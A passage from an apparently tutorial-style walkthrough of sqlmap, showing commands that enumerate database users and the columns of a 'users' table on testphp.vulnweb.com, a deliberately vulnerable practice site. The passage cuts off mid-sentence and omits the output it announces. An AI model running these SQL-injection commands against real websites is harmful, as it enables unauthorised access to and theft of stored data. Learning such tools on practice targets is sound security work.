Similarly, on vulnerable websites, we can literally explore through databases to extract information with other commands.
With this command, we can get all users from database:
$ python sqlmap.py -u [URL] --userssqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=*" --users
Here, we obtain users registered in the database-management system:
With this command, we can get columns from a table:
$ python sqlmap.py -u [URL] -D [Database] -T [table] --columnssqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=*" -D acuart -T users --columns
Here, we obtain columns from the users table:
With this command, we can ...